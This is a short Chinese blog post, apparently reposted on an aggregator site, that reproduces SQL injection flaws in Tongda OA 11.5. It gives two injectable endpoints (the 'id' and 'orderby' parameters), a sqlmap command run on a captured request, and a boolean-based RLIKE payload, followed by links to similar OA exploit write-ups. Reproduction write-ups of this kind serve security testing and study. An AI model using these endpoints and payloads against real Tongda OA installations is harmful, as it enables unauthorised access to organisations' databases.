通达OA 11.5 sql注入漏洞复现 - 代码天地

通达OA 11.5 sql注入漏洞复现

其他 2021-03-08 15:13:25 阅读次数: 0

下载地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe

1.登录一个账户
在这里插入图片描述 2.构造url http://192.168.1.1general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2，burp抓包

id参数存在延时注入
在这里插入图片描述直接复制数据包，id参数加个*保存到sqlmap跑
python sqlmap.py -r 1.txt

orderby参数
构造/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=1&pagelimit=10&tag=&timestamp=1598069103&total=

在这里插入图片描述
payload：RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_45291045/article/details/113800862

通达OA 11.5 sql注入漏洞复现

通达OA<11.5版本漏洞分析与复现

通达OA 11.7 后台sql注入getshell漏洞复现

通达OA rce复现

漏洞复现之通达OA命令执行

通达OA命令执行漏洞复现

通达OA 11.2后台getshell漏洞复现

通达OA SQL注入漏洞【CVE-2023-4166】

通达OA SQL注入漏洞【CVE-2023-4165】

红帆OA SQL注入漏洞复现

通达OA-2017版本漏洞复现

通达OA 前台任意用户登录漏洞复现

复现通达OA前台任意用户登录漏洞

近日出的通达OA任意用户登录漏洞复现

通达OA最新RCE漏洞分析

通达OA前台任意用户登录漏洞

通达OA远程代码执行漏洞通告

【漏洞复现】通达OA v11.7 在线任意用户登录漏洞

通达OA任意文件上传+包含getshell复现分析

4.22通达oa任意用户登录复现

通达OA前台任意用户登陆复现

【漏洞复现】广联达OA漏洞合集(信息泄露+SQL注入+文件上传)

通达OA 文件上传+任意文件包含漏洞分析

11.5

通达OA文件上传+文件包含导致远程代码执行漏洞复现

通达OA v11.9 getdata任意命令执行漏洞复现+利用

通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现

【漏洞日记】深X服还没完，通达OA又搞RCE漏洞【OA V11.6】

广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现（HW0day）

【1day】复现泛微OA某版本SQL注入漏洞

今日推荐

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

周排行

Java基础复习_day13_Collection集合

2018.11.16 c语言学习经验

且看Java内置四大核心函数式接口

小程序云开发中数据库的数据分段和显示图片

python的函数

Web-JS进阶

【干货】C++常用代码积累笔记大全

Spring的ioc操作与 IOC底层原理

构建之法20191121-11 Scrum立会报告+燃尽图 07

Spring boot之Hello World访问404

每日归档

更多

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)